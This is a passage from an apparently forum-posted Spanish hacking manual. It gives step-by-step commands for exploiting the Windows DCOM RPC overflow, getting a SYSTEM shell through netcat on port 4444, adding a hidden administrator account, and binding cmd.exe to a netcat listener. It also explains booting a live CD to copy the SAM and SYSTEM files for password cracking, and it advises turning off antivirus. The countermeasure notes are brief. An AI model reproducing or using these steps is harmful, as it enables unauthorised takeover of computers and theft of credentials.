sabremos lo que en realidad estamos apunto de hacer.

Ya que sabemos algo de la vulnerabilidad procedemos a descargarnos el exploit de aquí:

http://cyruxnet.com.ar/rpcxploit2.htm
y tambien necesitaremos el netcat para que de una vez se lo vayan descargando (la
version para Windows es solamente un ejecutable con el nombre nc.exe).

Aquí no voy a explicar como se compila un exploit ya que ese no es el objetivo de este
caso y ademas este exploit es muy facil encontrarlo ya compilado.

Otra pagina en la cual pueden encontrar una basta cantidad de exploits es la siguiente:
http://www.securityfocus.com/

NOTA: Muchos antivirus te detectaran este tipo de archivos como virus, pero en
realidad no lo son asi de que yo recomiendo desactiven el antivirus antes de
descargarselo por que lo mas seguro es que se los deje inservible.

La forma en la que se ejecuta es la siguiente:

Inicio – ejecutar – cmd y una vez alli nos desplazamos hasta la carpeta en la que
tenemos guardado nuestro ejecutable del exploit.
Para ver las opciones de dicho exploit solo basta con ejecutarlo, en mi caso me muestra
las siguientes opciones(yo ejecuto dcom por que asi esta nombrado el exe de mi exploit
el cual esta dentro de la carpeta tool):

Código:
C:\>cd tool

C:\tool>dcom
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin LauziÞre <blauziere [at] altern.org>
- Universalized for kiddie extravaganza by da barabas
- Usage: dcom <Target ID> <Target IP>
- Targets:
-          0    Windows 2000
-          1    Windows XP

C:\tool>

Como podran observar alli mismo me dice como utilizarlo correctamente, solo es cosa
de poner:

Código:
- Usage: dcom <Target ID> <Target IP>

Donde target se refiere al sistema operativo y la ip valgase repetirlo, seria nuestra ip,
aunque cabe decir que la forma de decir que lo ejecute en nuestra propia maquina seria
poniendo 127.0.0.1 que es la ip de localhost, asi de que ya saben como ejecutarlo, si
tienen un Windows 2000 seria 0 y si es XP 1, en mi caso es XP asi de que ejecuto:
Código:
C:\tool\dcom 1 127.0.0.1

Como podran observar se ejecuto sin ningun problema, ahora es es cosa de conectarno
con el netcat al puerto 4444.

Para usar el netcat de forma que se conecte a dicho puerto solo es cuestion de ejecutar:
Código:
nc ip puerto

en caso de que quieran que les muestre mas información de la necesaria basta con
agregar –vv, ahora solo tenemos que desplazarnos hasta la carpeta que contenga nuestro
ejecutable de netcat, en mi caso lo tengo en la misma carpeta del exploit asi de que
ejecuto el comando “nc –vv 127.0.0.1 4444”

y wala!!!!
Ya estamos conectados a nuestro propio equipo pero no como un usuario restringido
sino que estamos conectados con privilegios del usuario system el cual tiene muchos
mas derechos sobre el equipo que el mismo administrador, seria como decir que es el
usuario maquina de nuestra computadora al cual nuestro administrador le pide permiso
para realizar acciones.

¿Cómo se que después de ejecutar el exploit me dio permisos de system y no de un

usuario normal?
Sencillo, como habran notado justo después de haber ejecutado el netcat para que me
conectara al puerto indicado ya no me encontraba dentro de la carpeta tool en la cual
ejecute el netcat sino que automáticamente me puso dentro de la carpeta system32
(observen la imagen detenidamente):

Esto es por que me dio permisos de system, si me hubiera dado permisos de un usuario
normal me hubiera dejado dentro del escritorio del usuario que estaba usando la
maquina es ese momento.

Nota: La mayoria de los exploit que atacan a xp y nos dan shell remota siempre nos dan
permisos de system, que es mucho mejor que tener permisos de administrador.

Lo demas ya es cosa sencilla solo tenemos que crear un nuevo usuario y agregarlo al
grupo de administradores(crear el usuario lo digo por si es que estamos dentro de la
cuenta de invitado).
Para agregar un usuario llamdo zhyzura con contraseña kaka seria:
Código:
net user zhyzura kaka /add

Para agregar el usuario zhyzura al grupo de administradores seria:

Código:
net localgroup administradores zhyzura /add

Como podran observar nunca me denego el acceso a estas acciones, gracias a que
estamos en la todo poderosa cuenta de system.
Ya que tenemos nuestro nuevo usuario dentro del grupo administradores solo es
cuestion de volver a iniciar sesion para que los cambios surtan efecto.

OJO!!!!!!!!!!!!!!!
Al momento de que cierren la ventana en la cual estamos conectados como system les
va a aparecer la siguiente ventana:

¿Recuerdan esa ventana? ¿alguna vez estuvieron infectados por el virus llamado
BLASTER?
Si lo estuvieron entonces recordaran esta ventana la cual siempre les aparecia cuando se
conectaban a Internet y después de un minuto les reiniciaba la computadora.
El motivo por el cual les ha aparecido es por que al momento de que ejecutamos el
exploit lo que hizo fue atacar un servicio de Windows el cual tenia privilegios de system
y al momento de cerrar esa ventana lo que hicimos fue que dicho servicio creara un
crash en un proceso primordial de Windows sin el cual se ve obligado a reiniciar.
Hay dos formas de solucionar esto.
La primera es quedarnos de brazos cruzados al momento de que nos aparezca por que
ya no podremos evitarlo xD.
La segunda es:
Antes de que vayamos a cerrar la ventana primero ponemos el netcat a la escucha con el
comando:

Código:
nc -l -d -e cmd.exe -p 6000

y antes de cerrar la ventana primero abrimos otra y nos conectamos nuevamente pero
ahora sera al puerto 6000:

Código:
nc -vv 127.0.0.1 6000

Ya que hicimos esto, ahora si ya podemos cerrar ambas ventanas y asi podremos
reiniciar comodamente sin que nos aparezca dicha ventana.

Gracias Mek por este dato

CONTRAMEDIDAS PARA ESTE METODO

Es sencillo saber que para que este metodo no sea 100% funcionable basta con que
nuestro administrador descargue todas las actualizaciones de Windows y mantenga sus
equipos al dia.

 
UTILIZANDO UN LIVE-CD

Un Live Cd es un sistema operativo que se ejecuta directamente desde un cd-rom de tal

forma que no es necesario instalarlo en el disco duro para que funcione.
..sR. aDiKtO..
Citar
¿Cómo se consigue eso? pues detectando el hardware del PC cada vez que se arranca
con el CD de la distribución y usando la memoria RAM para leer y guardar datos.
Muchas permiten usar una parte del disco duro como partición de intercambio y guardar
la configuración en un floppy o llavero USB.

Existen bastantes live cd como para decirles cual es el que deban de utilizar, asi de que
seleccionen el que mas les guste y a trabajar se ha dicho ademas de que sera un muy
buen comienzo para aquellos que no conozcan nada sobre el mundo *NIX.

En mi caso voy a utilizar “Auditor Security Collection”, el cual es un live-cd

especializado en herramientas de seguridad, claro que no es necesario que busquen un
live cd de este tipo pero en mi caso es el unico que tengo a la mano.

Primero lo tenemos que introducir en nuestra unidad de cd-rom y reiniciar el equipo,

recuerden que tienen que configurar su BIOS para que arranque primero desde el cd-
rom antes que el disco duro.
Al momento de que comienza a arrancar nos aparecera una pantalla en la cual dice
BOOT: Alli tenemos que colocar la letra de la resolucion que queramos utilizar, en mi
caso coloco un 2, después de eso solo es cuestion de esperar a que cargue el entorno
grafico.
Dependiendo del live-cd que tengamos en mano seran las preguntas que nos hara, va a
ver casos en los cuales tambien nos pedira el tipo de teclado que tenemos asi como
tambien nos pedira la tarjeta grafica que tenemos, y es aquí donde muchos van a
decirme que no pueden arrancar el entorno grafico y solo los deja en la shell (en la
pantalla negra xD), si tienen ese mismo problema, recuerden que al momento de poner
la tarjeta grafica que tienen, seleccionen VESA, asi no tendran ningun problema.

Muy bien ahora que estamos dentro de nuestro GNU/Linux lo que tenemos que hacer es
copiar los archivos SAM y SYSTEM, para ello vamos a dar clic en el icono siguiente
para que se habra nuestro explorador (o tambien pueden presionar Alt+F2 y escribir
konqueror):

Ahora en la ventana que nos a aparecido tenemos que dar un clic en el siguiente icono
para que nos muestre los dispositivos de nuestra computadora:

Como podran observar en mi caso me muestra varias particiones:

hda1, hda2 y hda3.

Para saber en que partición tenemos instalado nuestro Windows solo es cuestion de
saber en que partición esta instalado nuestro Windows para asi entrar y copiar
tranquilamente los archivos SAM y SYSTEM.
Para el que no lo sepa, las particiones en GNU/Linux se identifican de la siguiente
forma:
hdaX = hda se refiere al disco duro que se encuentra como maestro del primer cable
IDE de nuestra computadora y la X se rfiere al numero de partición que tiene dicho
disco duro.
hdbX = hdb se refiere al disco duro que se encuentra como esclavo del primer cable
IDE y la X se refiere al numero de partición de dicho disco duro.

Ahora muchos me diran, ya se como copiar los archivos pero ahora ¿Cómo los saco con
mi memoria flash o floppy si mi computadora no tiene acceso a internet?
Cabe decir que no todas las distribuciones de Linux te detectan las memorias flash de
modo que solo conectes y ya puedas copiar archivos sino que nosotros tenemos que
montarla antes de poder usarla, para ello vamos a abrir la consola, dando clic en el
siguiente icono:

Una vez alli solo tenemos que crear una carpeta en la cual montaremos nuestra memoria
flash de la siguiente forma:
Código:
mkdir /flash
después solo es cuestion de montar nuestra memoria con el siguiente comando:
Código:
mount /dev/sda1 /flash

y ahora si solo es cosas de copiar los archivos alli.

Recuerden que sda se refiere al dispositivo en este caso mi flash y el 1 se refiere a la
partición, me ha tocado ver casos en los cuales para montar una memoria flash solo
debo de poner sda sin ningun numero.

En caso de que sea un diskette solo tenemos que cambiar sda1 por fd0 y listo.
Ahora si ya estan listos para crackear los dos archivos y ya de paso dieron sus primeros
pasos en GNU/Linux.

El proceso de crackear el archivo sam creo que ya se explico bastantes veces en este

manual asi de que ya saben donde leer .

CONTRAMEDIDAS PARA ESTE METODO

Pues si bien este metodo es bastante sencillo una forma de hacerles la vida imposible a
los chicos listos lo mejor es ponerle un password a la bios asi como tambien es bueno
tener contraseñas extremadamente complejas, recuerden poner numeros junto con letras
tanto mayusculas como minusculas y si les es posible pongan alguno que otro carácter
en codigo ASCII.

 
OBTENER LAS CONTRASEÑAS DE FORMA REMOTA

Aquí es donde la cosa se torna un poco mas interesante, por que podremos obtener la
contraseña del administrador de un equipo sin necesidad de que tengamos que estar
frente al equipo.

Para lograrlo lo que se necesitara sera colocar un sniffer que este interceptando todo el
trafico que pasa por nuestra red de tal forma que tambien podra obtener las hashes de la
contraseña del administrador con el simple hecho de entrar a una carpeta que estemos
compartiendo en nuestro equipo.

En este caso tendran que leer un manual escrito por mi compañero Gospel que lo
explica detalladamente asi de que si alguien no entiende completamente los pasos que
se explican alli lo mas seguro es que se deba a que nunca leyo la primer parte de este
manual.

Aquí esta el link de descarga:

http://personal.telefonica.terra.es/web/alexb/manus/Practica.2.Sniffar.Password.Windo
ws.byGospel.zip